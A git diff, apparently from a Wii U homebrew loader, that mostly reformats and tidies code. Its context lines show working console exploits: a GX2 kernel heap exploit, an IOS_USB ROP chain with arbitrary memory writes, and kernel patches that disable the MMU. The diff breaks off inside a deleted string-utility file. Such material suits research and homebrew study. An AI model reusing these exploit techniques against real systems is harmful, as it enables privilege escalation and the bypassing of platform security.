diff --git a/source/ElfUtils.c b/source/ElfUtils.c index 2d6b830..359aae2 100644 --- a/source/ElfUtils.c +++ b/source/ElfUtils.c @@ -2,22 +2,21 @@ #include #include -#include #include #include #include #include #include +#include #include "elf_abi.h" - int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *sizeOut) { char path[256]; int result = 0; char *sdRootPath = ""; if (!WHBMountSdCard()) { - WHBLogPrintf("Failed to mount SD Card..."); + DEBUG_FUNCTION_LINE("Failed to mount SD Card..."); result = -1; goto exit; } @@ -25,12 +24,12 @@ int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *si sdRootPath = WHBGetSdCardMountPath(); sprintf(path, "%s/%s", sdRootPath, relativefilepath); - WHBLogPrintf("Loading file %s.", path); + DEBUG_FUNCTION_LINE("Loading file %s.", path); *fileOut = WHBReadWholeFile(path, sizeOut); if (!(*fileOut)) { result = -2; - WHBLogPrintf("WHBReadWholeFile(%s) returned NULL", path); + DEBUG_FUNCTION_LINE("WHBReadWholeFile(%s) returned NULL", path); goto exit; } @@ -74,16 +73,19 @@ static unsigned int get_section(unsigned char *data, const char *name, unsigned for (i = 0; i < ehdr->e_shnum; i++) { const char *section_name = ((const char *) data) + shdr[ehdr->e_shstrndx].sh_offset + shdr[i].sh_name; if (strcmp(section_name, name) == 0) { - if (addr) + if (addr) { *addr = shdr[i].sh_addr; - if (size) + } + if (size) { *size = shdr[i].sh_size; + } return shdr[i].sh_offset; } } - if (fail_on_not_found) + if (fail_on_not_found) { OSFatal((char *) name); + } return 0; } diff --git a/source/ElfUtils.h b/source/ElfUtils.h index e55663d..67ad225 100644 --- a/source/ElfUtils.h +++ b/source/ElfUtils.h @@ -1,5 +1,4 @@ -#ifndef ELF_LOADING_H -#define ELF_LOADING_H +#pragma once #include @@ -13,6 +12,3 @@ uint32_t load_loader_elf_from_sd(unsigned char *baseAddress, const char *relativ #ifdef __cplusplus } #endif - -#endif /* ELF_LOADING_H */ - diff --git a/source/gx2sploit.cpp b/source/gx2sploit.cpp index 1333ea8..f902c83 100644 --- a/source/gx2sploit.cpp +++ b/source/gx2sploit.cpp @@ -14,46 +14,20 @@ #include #include "ElfUtils.h" #include "gx2sploit.h" -#include "utils/utils.h" + +#define JIT_ADDRESS 0x01800000 + +#define KERN_HEAP 0xFF200000 +#define KERN_HEAP_PHYS 0x1B800000 -#define JIT_ADDRESS 0x01800000 +#define KERN_CODE_READ 0xFFF023D4 +#define KERN_CODE_WRITE 0xFFF023F4 +#define KERN_DRVPTR 0xFFEAB530 -#define KERN_HEAP 0xFF200000 -#define KERN_HEAP_PHYS 0x1B800000 - - -#define KERN_CODE_READ 0xFFF023D4 -#define KERN_CODE_WRITE 0xFFF023F4 -#define KERN_DRVPTR 0xFFEAB530 -#define KERN_ADDRESS_TBL 0xFFEAB7A0 - -#define STARTID_OFFSET 0x08 -#define METADATA_OFFSET 0x14 -#define METADATA_SIZE 0x10 - -#define BAT_SETUP_HOOK_ADDR 0xFFF1D624 -#define BAT_SETUP_HOOK_ENTRY 0x00880000 -#define BAT4U_VAL 0x008000FF -#define BAT4L_VAL 0x30800012 - -#define BAT_SET_NOP_ADDR_1 0xFFF06B6C -#define BAT_SET_NOP_ADDR_2 0xFFF06BF8 -#define BAT_SET_NOP_ADDR_3 0xFFF003C8 -#define BAT_SET_NOP_ADDR_4 0xFFF003CC -#define BAT_SET_NOP_ADDR_5 0xFFF1D70C -#define BAT_SET_NOP_ADDR_6 0xFFF1D728 -#define BAT_SET_NOP_ADDR_7 0xFFF1D82C - -#define BAT_SET_NOP_ADDR_8 0xFFEE11C4 -#define BAT_SET_NOP_ADDR_9 0xFFEE11C8 - -#define ADDRESS_main_entry_hook 0x0101c56c -#define ADDRESS_OSTitle_main_entry_ptr 0x1005E040 - -#define NOP_ADDR(addr) \ - *(uint32_t*)addr = 0x60000000; \ - asm volatile("dcbf 0, %0; icbi 0, %0" : : "r" (addr & ~31)); +#define STARTID_OFFSET 0x08 +#define METADATA_OFFSET 0x14 +#define METADATA_SIZE 0x10 extern "C" void SCKernelCopyData(uint32_t addr, uint32_t src, uint32_t len); @@ -63,8 +37,9 @@ static void *find_gadget(uint32_t code[], uint32_t length, uint32_t gadgets_star /* Search code before JIT area first */ for (ptr = (uint32_t *) gadgets_start; ptr != (uint32_t *) JIT_ADDRESS; ptr++) { - if (!memcmp(ptr, &code[0], length)) + if (!memcmp(ptr, &code[0], length)) { return ptr; + } } OSFatal("Failed to find gadget!"); @@ -131,7 +106,7 @@ int exploitThread(int argc, char **argv) { uint32_t gx2data[] = {0xfc2a0000}; uint32_t gx2data_addr = (uint32_t) find_gadget(gx2data, 0x04, 0x10000000); uint32_t doflush[] = {0xba810008, 0x8001003c, 0x7c0803a6, 0x38210038, 0x4e800020, 0x9421ffe0, 0xbf61000c, 0x7c0802a6, 0x7c7e1b78, 0x7c9f2378, 0x90010024}; - void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t, uint32_t)) find_gadget(doflush, 0x2C, 0x01000000) + 0x14; + void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t, uint32_t)) (((uint32_t) find_gadget(doflush, 0x2C, 0x01000000)) + 0x14); /* Modify a next ptr on the heap */ uint32_t kpaddr = KERN_HEAP_PHYS + STARTID_OFFSET; @@ -185,8 +160,8 @@ extern "C" void SC_KernelCopyData(uint32_t dst, uint32_t src, uint32_t len); void KernelWrite(uint32_t addr, const void *data, uint32_t length) { // This is a hacky workaround, but currently it only works this way. ("data" is always on the stack, so maybe a problem with mapping values from the JIT area?) // further testing required. - for (int32_t i = 0; i < length; i += 4) { - KernelWriteU32(addr + i, *(uint32_t *) (data + i)); + for (uint32_t i = 0; i < length; i += 4) { + KernelWriteU32(addr + i, *(uint32_t *) (((uint32_t) data) + i)); } } @@ -203,17 +178,6 @@ void KernelWriteU32(uint32_t addr, uint32_t value) { ICInvalidateRange((void *) addr, 4); } - -void KernelWriteU32FixedAddr(uint32_t addr, uint32_t value) { - ICInvalidateRange(&value, 4); - DCFlushRange(&value, 4); - - uint32_t dst = (uint32_t) addr; - uint32_t src = (uint32_t) OSEffectiveToPhysical((uint32_t) &value); - - SC_KernelCopyData(dst, src, 4); -} - static void SCSetupIBAT4DBAT5() { asm volatile("sync; eieio; isync"); @@ -236,7 +200,6 @@ static void SCSetupIBAT4DBAT5() { extern "C" void SC_0x36_SETBATS(void); - int DoKernelExploit(void) { WHBLogPrintf("Running GX2Sploit"); /* Make a thread to modify the semaphore */ diff --git a/source/gx2sploit.h b/source/gx2sploit.h index 39e27d1..a294363 100644 --- a/source/gx2sploit.h +++ b/source/gx2sploit.h @@ -1,6 +1,5 @@ #pragma once - #ifdef __cplusplus extern "C" { #endif @@ -13,7 +12,6 @@ extern "C" { int DoKernelExploit(void); -void KernelWriteU32FixedAddr(uint32_t addr, uint32_t value); void KernelWrite(uint32_t addr, const void *data, uint32_t length); void kern_write(const void *addr, uint32_t value); @@ -21,9 +19,6 @@ extern int32_t Register(char *driver_name, uint32_t name_length, void *buf1, voi extern void CopyToSaveArea(char *driver_name, uint32_t name_length, void *buffer, uint32_t length); extern void set_semaphore_phys(uint32_t set_semaphore, uint32_t kpaddr, uint32_t gx2data_addr); -extern void SC0x25_SetupSyscall(void); -extern unsigned int SC0x65_ExploitCheck(unsigned int in); - #ifdef __cplusplus } #endif diff --git a/source/ios_exploit.c b/source/ios_exploit.c index d8daadb..e98ef60 100644 --- a/source/ios_exploit.c +++ b/source/ios_exploit.c @@ -5,19 +5,12 @@ #include #include "ios_exploit.h" -#define ALIGN4(x) (((x) + 3) & ~3) - #define CHAIN_START 0x1016AD40 -#define SHUTDOWN 0x1012EE4C -#define SIMPLE_RETURN 0x101014E4 #define SOURCE (0x120000) #define IOS_CREATETHREAD 0x1012EABC #define ARM_CODE_BASE 0x08135000 #define REPLACE_SYSCALL 0x081298BC -extern const uint8_t launch_image_tga[]; -extern const uint32_t launch_image_tga_size; - static void uhs_exploit_init(int uhs_handle); static int uhs_write32(int uhs_handle, int arm_addr, int val); @@ -237,7 +230,7 @@ static const int final_chain[] = { 0x0, // 0x1F0 0x101063db, // 0x1F4 POP {R1,R2,R5,PC} 0x0, // 0x1F8 - sizeof(ios_kernel), // 0x1FC our code size + sizeof(ios_kernel),// 0x1FC our code size 0x0, // 0x200 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC} 0x00140000, // 0x208 our code source location @@ -326,10 +319,10 @@ static void uhs_exploit_init(int dev_uhs_0_handle) { } static int uhs_write32(int dev_uhs_0_handle, int arm_addr, int val) { - ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes - DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress) - OSSleepTicks(0x200000); //! Improves stability - int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1 + ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes + DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress) + OSSleepTicks(0x200000); //! Improves stability + int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1 int output_buffer[32]; return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer)); } @@ -337,13 +330,7 @@ static int uhs_write32(int dev_uhs_0_handle, int arm_addr, int val) { int ExecuteIOSExploit() { int iosuhaxFd = IOS_Open("/dev/iosuhax", 0); if (iosuhaxFd >= 0) { - int dummy = 0; - - //IOS_Ioctl(iosuhaxFd, 0x03, &dummy, sizeof(dummy), &dummy, sizeof(dummy)); - //! do not run patches again as that will most likely crash - //! because the wupserver and the iosuhax dev node are still running - //! just relaunch IOS with new configuration IOS_Close(iosuhaxFd); return 0; } diff --git a/source/ios_exploit.h b/source/ios_exploit.h index c7dceec..ec0b2ed 100644 --- a/source/ios_exploit.h +++ b/source/ios_exploit.h @@ -1,5 +1,4 @@ -#ifndef _IOS_EXPLOIT_H_ -#define _IOS_EXPLOIT_H_ +#pragma once #ifdef __cplusplus extern "C" { @@ -10,5 +9,3 @@ int ExecuteIOSExploit(); #ifdef __cplusplus } #endif - -#endif diff --git a/source/ios_kernel/source/instant_patches.c b/source/ios_kernel/source/instant_patches.c index 7a76f63..363ce36 100644 --- a/source/ios_kernel/source/instant_patches.c +++ b/source/ios_kernel/source/instant_patches.c @@ -29,14 +29,13 @@ #define acp_phys(addr) ((u32)(addr) - 0xE0000000 + 0x12900000) void instant_patches_setup(void) { - // fix 10 minute timeout that crashes MCP after 10 minutes of booting - *(volatile u32*)(0x05022474 - 0x05000000 + 0x081C0000) = 0xFFFFFFFF; // NEW_TIMEOUT - + *(volatile u32 *) (0x05022474 - 0x05000000 + 0x081C0000) = 0xFFFFFFFF; // NEW_TIMEOUT + // patch default title id to system menu - *(volatile u32*)mcp_data_phys(0x050B817C) = *(volatile u32*)0x0017FFF0; - *(volatile u32*)mcp_data_phys(0x050B8180) = *(volatile u32*)0x0017FFF4; + *(volatile u32 *) mcp_data_phys(0x050B817C) = *(volatile u32 *) 0x0017FFF0; + *(volatile u32 *) mcp_data_phys(0x050B8180) = *(volatile u32 *) 0x0017FFF4; // force check USB storage on load - *(volatile u32*)acp_phys(0xE012202C) = 0x00000001; // find USB flag + *(volatile u32 *) acp_phys(0xE012202C) = 0x00000001; // find USB flag } diff --git a/source/ios_kernel/source/main.c b/source/ios_kernel/source/main.c index f843fd8..b929231 100644 --- a/source/ios_kernel/source/main.c +++ b/source/ios_kernel/source/main.c @@ -27,78 +27,76 @@ #define USB_PHYS_CODE_BASE 0x101312D0 -typedef struct -{ +typedef struct { u32 size; u8 data[0]; } payload_info_t; static const char repairData_set_fault_behavior[] = { - 0xE1,0x2F,0xFF,0x1E,0xE9,0x2D,0x40,0x30,0xE5,0x93,0x20,0x00,0xE1,0xA0,0x40,0x00, - 0xE5,0x92,0x30,0x54,0xE1,0xA0,0x50,0x01,0xE3,0x53,0x00,0x01,0x0A,0x00,0x00,0x02, - 0xE1,0x53,0x00,0x00,0xE3,0xE0,0x00,0x00,0x18,0xBD,0x80,0x30,0xE3,0x54,0x00,0x0D, + 0xE1, 0x2F, 0xFF, 0x1E, 0xE9, 0x2D, 0x40, 0x30, 0xE5, 0x93, 0x20, 0x00, 0xE1, 0xA0, 0x40, 0x00, + 0xE5, 0x92, 0x30, 0x54, 0xE1, 0xA0, 0x50, 0x01, 0xE3, 0x53, 0x00, 0x01, 0x0A, 0x00, 0x00, 0x02, + 0xE1, 0x53, 0x00, 0x00, 0xE3, 0xE0, 0x00, 0x00, 0x18, 0xBD, 0x80, 0x30, 0xE3, 0x54, 0x00, 0x0D, }; static const char repairData_set_panic_behavior[] = { - 0x08,0x16,0x6C,0x00,0x00,0x00,0x18,0x0C,0x08,0x14,0x40,0x00,0x00,0x00,0x9D,0x70, - 0x08,0x16,0x84,0x0C,0x00,0x00,0xB4,0x0C,0x00,0x00,0x01,0x01,0x08,0x14,0x40,0x00, - 0x08,0x15,0x00,0x00,0x08,0x17,0x21,0x80,0x08,0x17,0x38,0x00,0x08,0x14,0x30,0xD4, - 0x08,0x14,0x12,0x50,0x08,0x14,0x12,0x94,0xE3,0xA0,0x35,0x36,0xE5,0x93,0x21,0x94, - 0xE3,0xC2,0x2E,0x21,0xE5,0x83,0x21,0x94,0xE5,0x93,0x11,0x94,0xE1,0x2F,0xFF,0x1E, - 0xE5,0x9F,0x30,0x1C,0xE5,0x9F,0xC0,0x1C,0xE5,0x93,0x20,0x00,0xE1,0xA0,0x10,0x00, - 0xE5,0x92,0x30,0x54,0xE5,0x9C,0x00,0x00, + 0x08, 0x16, 0x6C, 0x00, 0x00, 0x00, 0x18, 0x0C, 0x08, 0x14, 0x40, 0x00, 0x00, 0x00, 0x9D, 0x70, + 0x08, 0x16, 0x84, 0x0C, 0x00, 0x00, 0xB4, 0x0C, 0x00, 0x00, 0x01, 0x01, 0x08, 0x14, 0x40, 0x00, + 0x08, 0x15, 0x00, 0x00, 0x08, 0x17, 0x21, 0x80, 0x08, 0x17, 0x38, 0x00, 0x08, 0x14, 0x30, 0xD4, + 0x08, 0x14, 0x12, 0x50, 0x08, 0x14, 0x12, 0x94, 0xE3, 0xA0, 0x35, 0x36, 0xE5, 0x93, 0x21, 0x94, + 0xE3, 0xC2, 0x2E, 0x21, 0xE5, 0x83, 0x21, 0x94, 0xE5, 0x93, 0x11, 0x94, 0xE1, 0x2F, 0xFF, 0x1E, + 0xE5, 0x9F, 0x30, 0x1C, 0xE5, 0x9F, 0xC0, 0x1C, 0xE5, 0x93, 0x20, 0x00, 0xE1, 0xA0, 0x10, 0x00, + 0xE5, 0x92, 0x30, 0x54, 0xE5, 0x9C, 0x00, 0x00, }; static const char repairData_usb_root_thread[] = { - 0xE5,0x8D,0xE0,0x04,0xE5,0x8D,0xC0,0x08,0xE5,0x8D,0x40,0x0C,0xE5,0x8D,0x60,0x10, - 0xEB,0x00,0xB2,0xFD,0xEA,0xFF,0xFF,0xC9,0x10,0x14,0x03,0xF8,0x10,0x62,0x4D,0xD3, - 0x10,0x14,0x50,0x00,0x10,0x14,0x50,0x20,0x10,0x14,0x00,0x00,0x10,0x14,0x00,0x90, - 0x10,0x14,0x00,0x70,0x10,0x14,0x00,0x98,0x10,0x14,0x00,0x84,0x10,0x14,0x03,0xE8, - 0x10,0x14,0x00,0x3C,0x00,0x00,0x01,0x73,0x00,0x00,0x01,0x76,0xE9,0x2D,0x4F,0xF0, - 0xE2,0x4D,0xDE,0x17,0xEB,0x00,0xB9,0x92,0xE3,0xA0,0x10,0x00,0xE3,0xA0,0x20,0x03, - 0xE5,0x9F,0x0E,0x68,0xEB,0x00,0xB3,0x20, + 0xE5, 0x8D, 0xE0, 0x04, 0xE5, 0x8D, 0xC0, 0x08, 0xE5, 0x8D, 0x40, 0x0C, 0xE5, 0x8D, 0x60, 0x10, + 0xEB, 0x00, 0xB2, 0xFD, 0xEA, 0xFF, 0xFF, 0xC9, 0x10, 0x14, 0x03, 0xF8, 0x10, 0x62, 0x4D, 0xD3, + 0x10, 0x14, 0x50, 0x00, 0x10, 0x14, 0x50, 0x20, 0x10, 0x14, 0x00, 0x00, 0x10, 0x14, 0x00, 0x90, + 0x10, 0x14, 0x00, 0x70, 0x10, 0x14, 0x00, 0x98, 0x10, 0x14, 0x00, 0x84, 0x10, 0x14, 0x03, 0xE8, + 0x10, 0x14, 0x00, 0x3C, 0x00, 0x00, 0x01, 0x73, 0x00, 0x00, 0x01, 0x76, 0xE9, 0x2D, 0x4F, 0xF0, + 0xE2, 0x4D, 0xDE, 0x17, 0xEB, 0x00, 0xB9, 0x92, 0xE3, 0xA0, 0x10, 0x00, 0xE3, 0xA0, 0x20, 0x03, + 0xE5, 0x9F, 0x0E, 0x68, 0xEB, 0x00, 0xB3, 0x20, }; -int _main() -{ - void(*invalidate_icache)() = (void(*)())0x0812DCF0; - void(*invalidate_dcache)(unsigned int, unsigned int) = (void(*)())0x08120164; - void(*flush_dcache)(unsigned int, unsigned int) = (void(*)())0x08120160; +int _main() { + void (*invalidate_icache)() = (void (*)()) 0x0812DCF0; + void (*invalidate_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120164; + void (*flush_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120160; - flush_dcache(0x081200F0, 0x4001); // giving a size >= 0x4000 flushes all cache + flush_dcache(0x081200F0, 0x4001); // giving a size >= 0x4000 flushes all cache - int level = disable_interrupts(); + int level = disable_interrupts(); - unsigned int control_register = disable_mmu(); + unsigned int control_register = disable_mmu(); - /* Save the request handle so we can reply later */ - *(volatile u32*)0x0012F000 = *(volatile u32*)0x1016AD18; + /* Save the request handle so we can reply later */ + *(volatile u32 *) 0x0012F000 = *(volatile u32 *) 0x1016AD18; - /* Patch kernel_error_handler to BX LR immediately */ - *(volatile u32*)0x08129A24 = 0xE12FFF1E; + /* Patch kernel_error_handler to BX LR immediately */ + *(volatile u32 *) 0x08129A24 = 0xE12FFF1E; - void * pset_fault_behavior = (void*)0x081298BC; - kernel_memcpy(pset_fault_behavior, (void*)repairData_set_fault_behavior, sizeof(repairData_set_fault_behavior)); + void *pset_fault_behavior = (void *) 0x081298BC; + kernel_memcpy(pset_fault_behavior, (void *) repairData_set_fault_behavior, sizeof(repairData_set_fault_behavior)); - void * pset_panic_behavior = (void*)0x081296E4; - kernel_memcpy(pset_panic_behavior, (void*)repairData_set_panic_behavior, sizeof(repairData_set_panic_behavior)); + void *pset_panic_behavior = (void *) 0x081296E4; + kernel_memcpy(pset_panic_behavior, (void *) repairData_set_panic_behavior, sizeof(repairData_set_panic_behavior)); - void * pusb_root_thread = (void*)0x10100174; - kernel_memcpy(pusb_root_thread, (void*)repairData_usb_root_thread, sizeof(repairData_usb_root_thread)); + void *pusb_root_thread = (void *) 0x10100174; + kernel_memcpy(pusb_root_thread, (void *) repairData_usb_root_thread, sizeof(repairData_usb_root_thread)); - payload_info_t *payloads = (payload_info_t*)0x00148000; - kernel_memcpy((void*)USB_PHYS_CODE_BASE, payloads->data, payloads->size); + payload_info_t *payloads = (payload_info_t *) 0x00148000; + kernel_memcpy((void *) USB_PHYS_CODE_BASE, payloads->data, payloads->size); // run all instant patches as necessary instant_patches_setup(); - *(volatile u32*)(0x1555500) = 0; + *(volatile u32 *) (0x1555500) = 0; - /* REENABLE MMU */ - restore_mmu(control_register); + /* REENABLE MMU */ + restore_mmu(control_register); - invalidate_dcache(0x081298BC, 0x4001); // giving a size >= 0x4000 invalidates all cache - invalidate_icache(); + invalidate_dcache(0x081298BC, 0x4001); // giving a size >= 0x4000 invalidates all cache + invalidate_icache(); - enable_interrupts(level); + enable_interrupts(level); - return 0; + return 0; } diff --git a/source/ios_kernel/source/utils.c b/source/ios_kernel/source/utils.c index 8ce65ae..03cd42f 100644 --- a/source/ios_kernel/source/utils.c +++ b/source/ios_kernel/source/utils.c @@ -23,38 +23,33 @@ ***************************************************************************/ // this memcpy is optimized for speed and to work with MEM1 32 bit access alignment requirement -void reverse_memcpy(void* dst, const void* src, unsigned int size) -{ +void reverse_memcpy(void *dst, const void *src, unsigned int size) { const unsigned char *src_p; unsigned char *dst_p; - if((size >= 4) && !((dst - src) & 3)) - { + if ((size >= 4) && !((dst - src) & 3)) { const unsigned int *src_p32; unsigned int *dst_p32; - unsigned int endDst = ((unsigned int)dst) + size; + unsigned int endDst = ((unsigned int) dst) + size; unsigned int endRest = endDst & 3; - if(endRest) - { - src_p = ((const unsigned char*)(src + size)) - 1; - dst_p = ((unsigned char*)endDst) - 1; + if (endRest) { + src_p = ((const unsigned char *) (src + size)) - 1; + dst_p = ((unsigned char *) endDst) - 1; size -= endRest; - while(endRest--) + while (endRest--) *dst_p-- = *src_p--; } - src_p32 = ((const unsigned int*)(src + size)) - 1; - dst_p32 = ((unsigned int*)(dst + size)) - 1; + src_p32 = ((const unsigned int *) (src + size)) - 1; + dst_p32 = ((unsigned int *) (dst + size)) - 1; unsigned int size32 = size >> 5; - if(size32) - { + if (size32) { size &= 0x1F; - while(size32--) - { + while (size32--) { src_p32 -= 8; dst_p32 -= 8; @@ -70,23 +65,20 @@ void reverse_memcpy(void* dst, const void* src, unsigned int size) } unsigned int size4 = size >> 2; - if(size4) - { + if (size4) { size &= 3; - while(size4--) + while (size4--) *dst_p32-- = *src_p32--; } - dst_p = ((unsigned char*)dst_p32) + 3; - src_p = ((const unsigned char*)src_p32) + 3; - } - else - { - dst_p = ((unsigned char*)dst) + size - 1; - src_p = ((const unsigned char*)src) + size - 1; + dst_p = ((unsigned char *) dst_p32) + 3; + src_p = ((const unsigned char *) src_p32) + 3; + } else { + dst_p = ((unsigned char *) dst) + size - 1; + src_p = ((const unsigned char *) src) + size - 1; } - while(size--) + while (size--) *dst_p-- = *src_p--; } diff --git a/source/ios_usb/source/main.c b/source/ios_usb/source/main.c index f9f5321..f82962f 100644 --- a/source/ios_usb/source/main.c +++ b/source/ios_usb/source/main.c @@ -1,24 +1,24 @@ -void _main() -{ +void _main() { - void(*ios_shutdown)(int) = (void(*)(int))0x1012EE4C; + void (*ios_shutdown)(int) = (void (*)(int)) 0x1012EE4C; - int(*reply)(int, int) = (int(*)(int, int))0x1012ED04; + int (*reply)(int, int) = (int (*)(int, int)) 0x1012ED04; - int saved_handle = *(volatile int*)0x0012F000; - int myret = reply(saved_handle, 0); - if (myret != 0) - ios_shutdown(1); + int saved_handle = *(volatile int *) 0x0012F000; + int myret = reply(saved_handle, 0); + if (myret != 0) { + ios_shutdown(1); + } - // stack pointer will be 0x1016AE30 - // link register will be 0x1012EACC - asm("LDR SP, newsp\n" - "LDR R0, newr0\n" - "LDR LR, newlr\n" - "LDR PC, newpc\n" - "newsp: .word 0x1016AE30\n" - "newlr: .word 0x1012EACC\n" - "newr0: .word 0x10146080\n" - "newpc: .word 0x10111164\n"); + // stack pointer will be 0x1016AE30 + // link register will be 0x1012EACC + asm("LDR SP, newsp\n" + "LDR R0, newr0\n" + "LDR LR, newlr\n" + "LDR PC, newpc\n" + "newsp: .word 0x1016AE30\n" + "newlr: .word 0x1012EACC\n" + "newr0: .word 0x10146080\n" + "newpc: .word 0x10111164\n"); } diff --git a/source/main.cpp b/source/main.cpp index 664c892..dfd78a2 100644 --- a/source/main.cpp +++ b/source/main.cpp @@ -1,41 +1,24 @@ #include #include -#include - -#include #include -#include #include -#include - #include #include -#include #include #include #include -#include +#include #include -#include #include #include "utils/logger.h" -#include "utils/utils.h" #include "ElfUtils.h" #include "ios_exploit.h" #include "gx2sploit.h" -#ifdef __cplusplus -extern "C" { -#endif - -#ifdef __cplusplus -} -#endif - bool CheckRunning() { switch (ProcUIProcessMessages(true)) { @@ -56,8 +39,6 @@ bool CheckRunning() { return true; } -extern "C" uint64_t _SYSGetSystemApplicationTitleId(int); - int main(int argc, char **argv) { WHBLogUdpInit(); @@ -105,13 +86,13 @@ int main(int argc, char **argv) { DEBUG_FUNCTION_LINE("ProcUIInit done"); if (loadWithoutHacks) { - DEBUG_FUNCTION_LINE("Load system menu"); - // Restore the default title id to the normal wii u menu. - unsigned long long sysmenuIdUll = _SYSGetSystemApplicationTitleId(0); + DEBUG_FUNCTION_LINE("Load Wii U Menu"); + // Restore the default title id to the normal Wii U Menu. + unsigned long long sysmenuIdUll = _SYSGetSystemApplicationTitleId(SYSTEM_APP_ID_HOME_MENU); memcpy((void *) 0xF417FFF0, &sysmenuIdUll, 8); DCStoreRange((void *) 0xF417FFF0, 0x8); - DEBUG_FUNCTION_LINE("THIS IS A TEST %016llX\n", sysmenuIdUll); + DEBUG_FUNCTION_LINE("Forcing start of title: %016llX\n", sysmenuIdUll); ExecuteIOSExploit(); SYSLaunchMenu(); @@ -123,7 +104,7 @@ int main(int argc, char **argv) { } ProcUIShutdown(); - DEBUG_FUNCTION_LINE("Bye!"); + DEBUG_FUNCTION_LINE("Exiting."); WHBLogUdpDeinit(); return 0; diff --git a/source/utils/StringTools.cpp b/source/utils/StringTools.cpp deleted file mode 100644 index d5c366f..0000000 --- a/source/utils/StringTools.cpp +++ /dev/null @@ -1,290 +0,0 @@ -/*************************************************************************** - * Copyright (C) 2010 - * by Dimok - * - * This software is provided 'as-is', without any express or implied - * warranty. In no event will the authors be held liable for any - * damages arising from the use of this software. - * - * Permission is granted to anyone to use this software for any - * purpose, including commercial applications, and to alter it and - * redistribute it freely, subject to the following restrictions: - * - * 1. The origin of this software must not be misrepresented; you - * must not claim that you wrote the original software. If you use - * this software in a product, an acknowledgment in the product - * documentation would be appreciated but is not required. - * - * 2. Altered source versions must be plainly marked as such, and - * must not be misrepresented as being the original software. - * - * 3. This notice may not be removed or altered from any source - * distribution. - * - * for WiiXplorer 2010 - ***************************************************************************/ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -BOOL StringTools::EndsWith(const std::string &a, const std::string &b) { - if (b.size() > a.size()) - return false; - return std::equal(a.begin() + a.size() - b.size(), a.end(), b.begin()); -} - -const char *StringTools::byte_to_binary(int32_t x) { - static char b[9]; - b[0] = '\0'; - - int32_t z; - for (z = 128; z > 0; z >>= 1) { - strcat(b, ((x & z) == z) ? "1" : "0"); - } - - return b; -} - -std::string StringTools::removeCharFromString(std::string &input, char toBeRemoved) { - std::string output = input; - size_t position; - while (1) { - position = output.find(toBeRemoved); - if (position == std::string::npos) - break; - output.erase(position, 1); - } - return output; -} - -const char *StringTools::fmt(const char *format, ...) { - static char strChar[512]; - strChar[0] = 0; - - va_list va; - va_start(va, format); - if ((vsprintf(strChar, format, va) >= 0)) { - va_end(va); - return (const char *) strChar; - } - va_end(va); - - return NULL; -} - -const wchar_t *StringTools::wfmt(const char *format, ...) { - static char tmp[512]; - static wchar_t strWChar[512]; - strWChar[0] = 0; - tmp[0] = 0; - - if (!format) - return (const wchar_t *) strWChar; - - if (strcmp(format, "") == 0) - return (const wchar_t *) strWChar; - - va_list va; - va_start(va, format); - if ((vsprintf(tmp, format, va) >= 0)) { - int bt; - int32_t strlength = strlen(tmp); - bt = mbstowcs(strWChar, tmp, (strlength < 512) ? strlength : 512); - - if (bt > 0) { - strWChar[bt] = 0; - return (const wchar_t *) strWChar; - } - } - va_end(va); - - return NULL; -} - -int32_t StringTools::strprintf(std::string &str, const char *format, ...) { - static char tmp[512]; - tmp[0] = 0; - int32_t result = 0; - - va_list va; - va_start(va, format); - if ((vsprintf(tmp, format, va) >= 0)) { - str = tmp; - result = str.size(); - } - va_end(va); - - return result; -} - -std::string StringTools::strfmt(const char *format, ...) { - std::string str; - static char tmp[512]; - tmp[0] = 0; - - va_list va; - va_start(va, format); - if ((vsprintf(tmp, format, va) >= 0)) { - str = tmp; - } - va_end(va); - - return str; -} - -BOOL StringTools::char2wchar_t(const char *strChar, wchar_t *dest) { - if (!strChar || !dest) - return false; - - int bt; - bt = mbstowcs(dest, strChar, strlen(strChar)); - if (bt > 0) { - dest[bt] = 0; - return true; - } - - return false; -} - -int32_t StringTools::strtokcmp(const char *string, const char *compare, const char *separator) { - if (!string || !compare) - return -1; - - char TokCopy[512]; - strncpy(TokCopy, compare, sizeof(TokCopy)); - TokCopy[511] = '\0'; - - char *strTok = strtok(TokCopy, separator); - - while (strTok != NULL) { - if (strcasecmp(string, strTok) == 0) { - return 0; - } - strTok = strtok(NULL, separator); - } - - return -1; -} - -int32_t StringTools::strextcmp(const char *string, const char *extension, char seperator) { - if (!string || !extension) - return -1; - - char *ptr = strrchr(string, seperator); - if (!ptr) - return -1; - - return strcasecmp(ptr + 1, extension); -} - - -std::vector StringTools::stringSplit(const std::string &inValue, const std::string &splitter) { - std::string value = inValue; - std::vector result; - while (true) { - uint32_t index = value.find(splitter); - if (index == std::string::npos) { - result.push_back(value); - break; - } - std::string first = value.substr(0, index); - result.push_back(first); - if (index + splitter.size() == value.length()) { - result.push_back(""); - break; - } - if (index + splitter.size() > value.length()) { - break; - } - value = value.substr(index + splitter.size(), value.length()); - } - return result; -} - - -const char *StringTools::FullpathToFilename(const char *path) { - if (!path) - return path; - - const char *ptr = path; - const char *Filename = ptr; - - while (*ptr != '\0') { - if (ptr[0] == '/' && ptr[1] != '\0') - Filename = ptr + 1; - - ++ptr; - } - - return Filename; -} - -void StringTools::RemoveDoubleSlashs(std::string &str) { - uint32_t length = str.size(); - - //! clear path of double slashes - for (uint32_t i = 1; i < length; ++i) { - if (str[i - 1] == '/' && str[i] == '/') { - str.erase(i, 1); - i--; - length--; - } - } -} - - -// You must free the result if result is non-NULL. -char *StringTools::str_replace(char *orig, char *rep, char *with) { - char *result; // the return string - char *ins; // the next insert point - char *tmp; // varies 